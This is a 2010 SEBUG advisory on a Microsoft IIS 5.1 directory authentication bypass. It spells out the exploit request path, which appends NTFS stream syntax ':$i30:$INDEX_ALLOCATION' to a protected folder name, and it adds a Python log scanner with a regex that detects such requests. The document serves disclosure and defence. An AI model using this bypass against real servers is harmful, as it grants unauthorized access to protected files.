Microsoft IIS 5.1 Directory Authentication Bypass

SEBUG-ID:19902
SEBUG-Appdir:Microsoft IIS
Published:2010-07-02
author:ICT (ictbh2_at_hotmail.com)
Vulnerable:
Microsoft IIS 5.1
Description:
Introduction: 
Although IIS5 is very old, finding one is not impossible! Therefore, I want to introduce a technique to bypass the IIS authentication methods on a directory. 

The vulnerability arises because a protected folder can be opened through Alternate Data Stream syntax. All IIS authentication methods can be circumvented this way: appending “:$i30:$INDEX_ALLOCATION” to a directory name bypasses the authentication. 
It is possible to run “secretfile.asp” by using: 
“/AuthNeeded:$i30:$INDEX_ALLOCATION/secretfile.asp” 
Instead of: 
“/AuthNeeded/secretfile.asp”
<*References
ICTBH@Hotmail.com
*>
Exploit:
The following procedures (methods) may contain something offensive; they are only for security research and teaching, at your own risk!
It is possible to run “secretfile.asp” by using: 
“/AuthNeeded:$i30:$INDEX_ALLOCATION/secretfile.asp” 
Instead of: 
“/AuthNeeded/secretfile.asp”
SEBUG Solution:
Update to IIS 6.0 or higher.
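
For servers that cannot be upgraded immediately, the request form described above can be looked for in IIS W3C logs. The following is an added example, not part of the original advisory: it flags any URI stem that uses stream syntax on a path segment, which goes slightly beyond the advisory by also matching the related “::$DATA” form and percent-encoded colons. The log field layout, the sample log lines and the "served anonymously" heuristic are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Stream syntax in a path segment: name:stream:$TYPE
# Covers the advisory's ":$i30:$INDEX_ALLOCATION" and the related "::$DATA" form.
STREAM_RE = re.compile(r":[^/:]*:\$(?:INDEX_ALLOCATION|DATA)", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so %3A and %253A forms are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_stream_requests(log_lines):
    """Return one dict per request whose URI stem uses stream syntax."""
    fields, hits = [], []
    for line in log_lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = fully_decode(row.get("cs-uri-stem", ""))
        if not STREAM_RE.search(stem):
            continue
        # Heuristic (assumption): a 200 with no authenticated user on such a
        # request suggests the directory protection was not enforced.
        anon = row.get("sc-status") == "200" and row.get("cs-username", "-") == "-"
        hits.append({"client": row.get("c-ip"), "stem": stem,
                     "status": row.get("sc-status"), "served_anonymously": anon})
    return hits

# Constructed sample log (not from the advisory); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2010-07-02 10:00:01 192.0.2.10 - GET /AuthNeeded/secretfile.asp 401
2010-07-02 10:00:05 192.0.2.10 - GET /AuthNeeded:$i30:$INDEX_ALLOCATION/secretfile.asp 200
2010-07-02 10:00:09 192.0.2.11 - GET /AuthNeeded%3A$i30%3A$INDEX_ALLOCATION/secretfile.asp 401
2010-07-02 10:01:00 192.0.2.12 alice GET /AuthNeeded/secretfile.asp 200
""".splitlines()

if __name__ == "__main__":
    for hit in find_stream_requests(SAMPLE_LOG):
        print(hit)
```

Any hit with `served_anonymously` set is worth treating as a possible successful bypass of the protected directory and investigating first.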

Microsoft
---------
http://www.microsoft.com/
// sebug.net [2010-07-02]